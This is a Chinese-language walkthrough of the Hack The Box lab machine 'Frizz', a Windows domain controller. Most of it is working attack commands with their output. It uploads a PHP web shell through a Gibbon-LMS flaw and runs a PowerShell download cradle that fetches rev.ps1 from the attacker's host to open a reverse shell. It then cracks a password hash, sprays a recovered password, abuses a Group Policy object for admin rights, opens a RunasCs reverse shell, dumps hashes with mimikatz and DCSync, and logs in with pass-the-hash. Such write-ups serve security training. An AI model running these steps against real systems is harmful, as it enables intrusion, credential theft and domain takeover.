系统:windows
内容:kerberos登录ssh,GPO Abuse
首先提醒一下,这个机器不是特别稳定。
扫描端口情况如下。
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
|_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-16 08:16:52Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
51211/tcp open msrpc Microsoft Windows RPC
51220/tcp open msrpc Microsoft Windows RPC
51248/tcp open msrpc Microsoft Windows RPC
Service Info: Hosts: localhost, FRIZZDC; OS: Windows; CPE: cpe:/o:microsoft:windows
将frizz.htb和frizzdc.frizz.htb加入hosts。
在Gibbon-LMS目录下,找到一个引用本地文件的页面。
利用Gibbon-LMS的上传漏洞,上传shell。这可能是user阶段最难处了。
~/D/t $curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" \
-H "Host: frizzdc.frizz.htb" \
--data-urlencode "img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K" \
--data-urlencode "path=s_shell.php" \
--data-urlencode "gibbonPersonID=0000000001"
s_shell.php
~/D/t $curl http://frizzdc.frizz.htb/Gibbon-LMS/s_shell.php?cmd=whoami
frizz\w.webservice
frizz\w.webservice
验收shell上传成功后,本地建立一个php服务器。
~/D/t $sudo php -S 0.0.0.0:80
[Sun Mar 16 08:49:05 2025] PHP 8.4.4 Development Server (http://0.0.0.0:80) started
[Sun Mar 16 08:49:19 2025] 10.10.11.60:60589 Accepted
[Sun Mar 16 08:49:19 2025] 10.10.11.60:60589 [200]: GET /rev.ps1
[Sun Mar 16 08:49:19 2025] 10.10.11.60:60589 Closing
然后让shell执行启动rev shell的代码,注意传入参数要编码。
~/D/t $curl http://frizzdc.frizz.htb/Gibbon-LMS/s_shell.php?cmd=powershell%2Eexe%20%2Dc%20IEX%28New%2DObject%20Net%2EWebClient%29%2EDownloadString%28%27http%3A%2F%2F10%2E10%2E16%2E2%2Frev%2Eps1%27%29
本地监听端口可得到交互shell。
~/D/t $rlwrap nc -nlvp 1234
Listening on 0.0.0.0 1234
Connection received on 10.10.11.60 60590
SHELL> whoami
frizz\w.webservice
查看网站的配置文件config.php,得到数据库连接密码。
SHELL> type config.php
...
$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!?1';
$databaseName = 'gibbon';
查看一下域用户。
SHELL> net user
User accounts for \\FRIZZDC
-------------------------------------------------------------------------------
a.perlstein Administrator c.ramon
c.sandiego d.hudson f.frizzle
g.frizzle Guest h.arm
J.perlstein k.franklin krbtgt
l.awesome m.ramon M.SchoolBus
p.terese r.tennelli t.wright
v.frizzle w.li w.Webservice
The command completed successfully.
由于shell不全交互,进入mysql的交互模式有问题,直接在命令行下查询数据库里的内容,得到一个密码的hash。
SHELL> cd mysql\bin
SHELL> .\mysql.exe -u MrGibbonsDB -pMisterGibbs!Parrot!?1 --database=gibbon -e "SHOW TABLES;"
...
gibbonperson
...
SHELL> .\mysql.exe -u MrGibbonsDB -pMisterGibbs!Parrot!?1 --database=gibbon -e "SELECT * FROM gibbonperson;"
gibbonPersonID title surname firstName preferredName officialName nameInCharacters gender username passwordStrong passwordStrongSalt passwordForceReset status canLogin gibbonRoleIDPrimary gibbonRoleIDAll dob e
gibbonPersonID title surname firstName preferredName officialName nameInCharacters gender username passwordStrong passwordStrongSalt passwordForceReset status canLogin gibbonRoleIDPrimary gibbonRoleIDAll dob e
gibbonPersonID title surname firstName preferredName officialName nameInCharacters gender username passwordStrong passwordStrongSalt passwordForceReset status canLogin gibbonRoleIDPrimary gibbonRoleIDAll dob email emailAlternate image_240 lastIPAddress lastTimestamp lastFailIPAddress lastFailTimestamp failCount address1 address1District address1Country address2 address2District address2Country phone1Type phone1CountryCode phone1 phone3Type phone3CountryCode phone3 phone2Type phone2CountryCode phone2 phone4Type phone4CountryCode phone4website languageFirst languageSecond languageThird countryOfBirth birthCertificateScan ethnicity religion profession employer jobTitle emergency1Name emergency1Number1 emergency1Number2 emergency1Relationshipemergency2Name emergency2Number1 emergency2Number2 emergency2RelationshipgibbonHouseID studentID dateStart dateEnd gibbonSchoolYearIDClassOf lastSchool nextSchool departureReason transport transportNotes calendarFeedPersonal viewCalendarSchool viewCalendarPersonal viewCalendarSpaceBooking gibbonApplicationFormID lockerNumber vehicleRegistration personalBackground messengerLastRead privacy dayType gibbonThemeIDPersonal gibboni18nIDPersonal studentAgreements googleAPIRefreshToken microsoftAPIRefreshToken genericAPIRefreshToken receiveNotificationEmails mfaSecret mfaToken cookieConsent fields
0000000001 Ms. Frizzle Fiona Fiona Fiona Frizzle Unspecified f.frizzle 067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03 /aACFhikmNopqrRTVz2489 N Full Y 001 001 NULL f.frizzle@frizz.htb NULL NULL ::1 2024-10-29 09:28:59 NULL NULL 0 NULL NULL NULL NULL YY N NULL NULL NULL NULL NULL NULL NULL Y NULL NULL NULL
使用hashcat可以破解密码,注意正确的hash文件格式。
~/D/t $cat hash.txt
067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489
~/D/t $hashcat -m 1420 hash.txt --wordlist /usr/share/wordlists/rockyou.txt
...
067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489:Jenni_Luvs_Magic23
...
在使用NTLM形式验证登录时,显示不支持。
~/D/t $/opt/check_auth.sh -u f.frizzle -p Jenni_Luvs_Magic23 $IP
Running: netexec smb 10.10.11.60 -u f.frizzle -p Jenni_Luvs_Magic23
SMB 10.10.11.60 445 10.10.11.60 [*] x64 (name:10.10.11.60) (domain:10.10.11.60) (signing:True) (SMBv1:False)
SMB 10.10.11.60 445 10.10.11.60 [-] 10.10.11.60\f.frizzle:Jenni_Luvs_Magic23 STATUS_NOT_SUPPORTED
----------------------------------------
Running: netexec winrm 10.10.11.60 -u f.frizzle -p Jenni_Luvs_Magic23
----------------------------------------
Running: netexec ldap 10.10.11.60 -u f.frizzle -p Jenni_Luvs_Magic23
LDAP 10.10.11.60 389 frizzdc.frizz.htb [*] x64 (name:frizzdc.frizz.htb) (domain:frizz.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.60 389 frizzdc.frizz.htb [-] frizz.htb\f.frizzle:Jenni_Luvs_Magic23 STATUS_NOT_SUPPORTED
----------------------------------------
看来要使用kerberos验证。先获取票据。
~/D/t $sudo ntpdate -u $IP
2025-03-16 16:12:20.563492 (+0100) +24108.979646 +/- 0.047245 10.10.11.60 s1 no-leap
CLOCK: time stepped by 24108.979646
~/D/t $impacket-getTGT frizz.htb/f.frizzle:Jenni_Luvs_Magic23 -k -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in f.frizzle.ccache
~/D/t $export KRB5CCNAME=f.frizzle.ccache
取得票据后,kerberos可以登录smb和ldap。
~/D/t $netexec smb frizzdc.frizz.htb -d frizz.htb -k --use-kcache
SMB frizzdc.frizz.htb 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False)
SMB frizzdc.frizz.htb 445 frizzdc [+] frizz.htb\f.frizzle from ccache
~/D/t $netexec winrm frizzdc.frizz.htb -d frizz.htb -k --use-kcache
~/D/t $netexec ldap frizzdc.frizz.htb -d frizz.htb -k --use-kcache
LDAP frizzdc.frizz.htb 389 frizzdc.frizz.htb [*] x64 (name:frizzdc.frizz.htb) (domain:frizz.htb) (signing:True) (SMBv1:False)
LDAP frizzdc.frizz.htb 389 frizzdc.frizz.htb [+] frizz.htb\f.frizzle from ccache
可以收集bloodhound信息了。
~/D/t $netexec ldap frizzdc.frizz.htb -d frizz.htb -k --use-kcache --bloodhound --collection All --dns-server $IP
LDAP frizzdc.frizz.htb 389 frizzdc.frizz.htb [*] x64 (name:frizzdc.frizz.htb) (domain:frizz.htb) (signing:True) (SMBv1:False)
LDAP frizzdc.frizz.htb 389 frizzdc.frizz.htb [+] frizz.htb\f.frizzle from ccache
LDAP frizzdc.frizz.htb 389 frizzdc.frizz.htb Resolved collection methods: session, dcom, localadmin, group, objectprops, psremote, rdp, trusts, acl, container
LDAP frizzdc.frizz.htb 389 frizzdc.frizz.htb Using kerberos auth without ccache, getting TGT
LDAP frizzdc.frizz.htb 389 frizzdc.frizz.htb Using kerberos auth from ccache
LDAP frizzdc.frizz.htb 389 frizzdc.frizz.htb Done in 00M 24S
LDAP frizzdc.frizz.htb 389 frizzdc.frizz.htb Compressing output into /home/kali/.nxc/logs/frizzdc.frizz.htb_frizzdc.frizz.htb_2025-03-16_162223_bloodhound.zip
在bloodhound中查看到f.frizzle属于winrm用户组。测试后,发现无法登录winrm,但可以登录ssh(由于机器不稳定,有时ssh也登录不上)。要提前设置好/etc/krb5.conf。至此取得user flag。
~/D/t $cat /etc/krb5.conf
[libdefault]
default_realm = FRIZZ.HTB
[realms]
FRIZZ.HTB = {
kdc = frizzdc.frizz.htb
admin_server = frizzdc.frizz.htb
}
[domain_realm]
frizz.htb = FRIZZ.HTB
.frizz.htb = FRIZZ.HTB
~/D/t $evil-winrm -i frizzdc.frizz.htb -r frizz.htb
...
Error: An error of type HTTPClient::ConnectTimeoutError happened, message is execution expired
Error: Exiting with code 1
malloc(): unaligned fastbin chunk detected
zsh: IOT instruction evil-winrm -i frizzdc.frizz.htb -r frizz.htb
~/D/t $ssh f.frizzle@$IP
The authenticity of host '10.10.11.60 (10.10.11.60)' can't be established.
ED25519 key fingerprint is SHA256:667C2ZBnjXAV13iEeKUgKhu6w5axMrhU346z2L2OE7g.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.60' (ED25519) to the list of known hosts.
PowerShell 7.4.5
PS C:\Users\f.frizzle> whoami
frizz\f.frizzle
PS C:\Users\f.frizzle> tree . /F
Folder PATH listing
Volume serial number is 000001EF D129:C3DA
C:\USERS\F.FRIZZLE
├───Desktop
│ user.txt
│
├───Documents
├───Downloads
├───Favorites
├───Links
├───Music
├───Pictures
├───Saved Games
└───Videos
接下来要查找如何root。上传winPEAS也没有找到任何有用的信息。但是在回收站里发现有个隐藏的目录和文件。
PS C:\$RECYCLE.BIN> dir -Force
Directory: C:\$RECYCLE.BIN
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs 10/29/2024 7:31 AM S-1-5-21-2386970044-1145388522-29327
01813-1103
PS C:\$RECYCLE.BIN> dir S-1-5-21-2386970044-1145388522-2932701813-1103
Directory: C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 10/29/2024 7:31 AM 148 $IE2XMEG.7z
-a--- 10/24/2024 9:16 PM 30416987 $RE2XMEG.7z
将这两个压缩文件复制下来。
~/D/t $scp -o GSSAPIAuthentication=yes -o GSSAPIDelegateCredentials=yes f.frizzle@$IP:'c:/temp/IE2XMEG.7z' ./
IE2XMEG.7z 100% 148 0.8KB/s 00:00
~/D/t $scp -o GSSAPIAuthentication=yes -o GSSAPIDelegateCredentials=yes f.frizzle@$IP:'c:/temp/RE2XMEG.7z' ./
RE2XMEG.7z 100% 29MB 3.7MB/s 00:07
本地解压缩,重叠一个wapt目录。
~/D/t $7z x RE2XMEG.7z
7-Zip 24.09 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-11-29
64-bit locale=C.UTF-8 Threads:4 OPEN_MAX:1024, ASM
Scanning the drive for archives:
1 file, 30416987 bytes (30 MiB)
Extracting archive: RE2XMEG.7z
--
Path = RE2XMEG.7z
Type = 7z
Physical Size = 30416987
Headers Size = 65880
Method = ARM64 LZMA2:26 LZMA:20 BCJ2
Solid = +
Blocks = 3
Everything is Ok
Folders: 684
Files: 5384
Size: 141187501
Compressed: 30416987
展开后在配置文件里找到一个密码。
~/D/t/w/c $cat waptserver.ini
[options]
allow_unauthenticated_registration = True
wads_enable = True
login_on_wads = True
waptwua_enable = True
secret_key = ylPYfn9tTU9IDu9yssP2luKhjQijHKvtuxIzX9aWhPyYKtRO7tMSq5sEurdTwADJ
server_uuid = 646d0847-f8b8-41c3-95bc-51873ec9ae38
token_secret_key = 5jEKVoXmYLSpi5F7plGPB4zII5fpx0cYhGKX5QC0f7dkYpYmkeTXiFlhEJtZwuwD
wapt_password = IXN1QmNpZ0BNZWhUZWQhUgo=
clients_signing_key = C:\wapt\conf\ca-192.168.120.158.pem
clients_signing_certificate = C:\wapt\conf\ca-192.168.120.158.crt
[tftpserver]
root_dir = c:\wapt\waptserver\repository\wads\pxe
log_path = c:\wapt\log
~/D/t $echo IXN1QmNpZ0BNZWhUZWQhUgo= |base64 -d
!suBcig@MehTed!R
使用密码喷洒可以得到该密码属于m.schoolbus用户。
~/D/t $kerbrute_linux_amd64 passwordspray --dc frizzdc.frizz.htb -d frizz.htb names.txt '!suBcig@MehTed!R'
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 03/19/25 - Ronnie Flathers @ropnop
2025/03/19 13:23:38 > Using KDC(s):
2025/03/19 13:23:38 > frizzdc.frizz.htb:88
2025/03/19 13:23:39 > [+] VALID LOGIN: M.SchoolBus@frizz.htb:!suBcig@MehTed!R
2025/03/19 13:23:39 > Done! Tested 21 logins (1 successes) in 0.664 seconds
接着取得M.SchoolBus的票据,并登录ssh。
~/D/t $impacket-getTGT frizz.htb/M.SchoolBus:'!suBcig@MehTed!R' -k -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in M.SchoolBus.ccache
~/D/t $export KRB5CCNAME=M.SchoolBus.ccache
~/D/t $ssh M.SchoolBus@$IP
PS C:\Users\M.SchoolBus> whoami
frizz\m.schoolbus
在bloodhound可以看到,M.SchoolBus属于组策略创建者的拥有者组。
接下来就是利用组策略的权限,进行GPO Abuse。
PS C:\Users\M.SchoolBus\Downloads> New-GPO -Name "whatever"
DisplayName : whatever
DomainName : frizz.htb
Owner : frizz\M.SchoolBus
Id : 395e9018-e87e-4ef4-aa68-e4e9667da882
GpoStatus : AllSettingsEnabled
Description :
CreationTime : 3/19/2025 5:49:59 AM
ModificationTime : 3/19/2025 5:49:59 AM
UserVersion :
ComputerVersion :
WmiFilter :
PS C:\Users\M.SchoolBus\Downloads> New-GPLink -Name "whatever" -Target "OU=Domain Controllers,DC=frizz,DC=htb"
GpoId : 395e9018-e87e-4ef4-aa68-e4e9667da882
DisplayName : whatever
Enabled : True
Enforced : False
Target : OU=Domain Controllers,DC=frizz,DC=htb
Order : 2
PS C:\Users\M.SchoolBus\Downloads> .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName whatever
[+] Domain = frizz.htb
[+] Domain Controller = frizzdc.frizz.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=frizz,DC=htb
[+] SID Value of M.SchoolBus = S-1-5-21-2386970044-1145388522-2932701813-1106
[+] GUID of "whatever" is: {395E9018-E87E-4EF4-AA68-E4E9667DA882}
[+] Creating file \\frizz.htb\SysVol\frizz.htb\Policies\{395E9018-E87E-4EF4-AA68-E4E9667DA882}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!
PS C:\Users\M.SchoolBus\Downloads> gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.
PS C:\Users\M.SchoolBus\Downloads> .\RunasCs.exe "M.SchoolBus" '!suBcig@MehTed!R' powershell.exe -r 10.10.16.2:1234
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-330d59$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 2628 created in background.
本地可以得到系统权限的rev shell。
PS C:\Windows\system32> whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeMachineAccountPrivilege Add workstations to domain Disabled
SeSecurityPrivilege Manage auditing and security log Disabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Disabled
SeSystemtimePrivilege Change the system time Disabled
SeProfileSingleProcessPrivilege Profile single process Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Disabled
SeCreatePagefilePrivilege Create a pagefile Disabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Disabled
SeUndockPrivilege Remove computer from docking station Disabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
SeCreateSymbolicLinkPrivilege Create symbolic links Disabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Disabled
可以上传mimikatz,得到administrator的hash。
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
568 {0;000003e7} 1 D 36007 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;0009c0bc} 0 D 651587 frizz\M.SchoolBus S-1-5-21-2386970044-1145388522-2932701813-1106 (16g,26p) Primary
* Thread Token : {0;000003e7} 1 D 727973 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz # lsadump::sam
Domain : FRIZZDC
SysKey : 02a7ae01010ecbfb70406e489a435ec7
Local SID : S-1-5-21-3873670720-2504411258-3912888090
SAMKey : 955b8e610ae76fc77ed8f9dc041048be
RID : 000001f4 (500)
User : Administrator
Hash NTLM: c299f8b2acc2da429d3a35953b3854d7
RID : 000001f5 (501)
User : Guest
RID : 000001f7 (503)
User : DefaultAccount
RID : 000001f8 (504)
User : WDAGUtilityAccount
mimikatz # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)
mimikatz # lsadump::dcsync /domain:frizz.htb /user:Administrator
[DC] 'frizz.htb' will be the domain
[DC] 'frizzdc.frizz.htb' will be the DC server
[DC] 'Administrator' will be the user account
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration :
Password last change : 2/25/2025 2:24:10 PM
Object Security ID : S-1-5-21-2386970044-1145388522-2932701813-500
Object Relative ID : 500
Credentials:
Hash NTLM: c457b5f1c315bef53b9cabc92e993d0b
然后可以以administrator身份直接登录(ssh登录又出错了)。
~/D/t $impacket-wmiexec frizz.htb/administrator@frizzdc.frizz.htb -hashes :c457b5f1c315bef53b9cabc92e993d0b -k -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands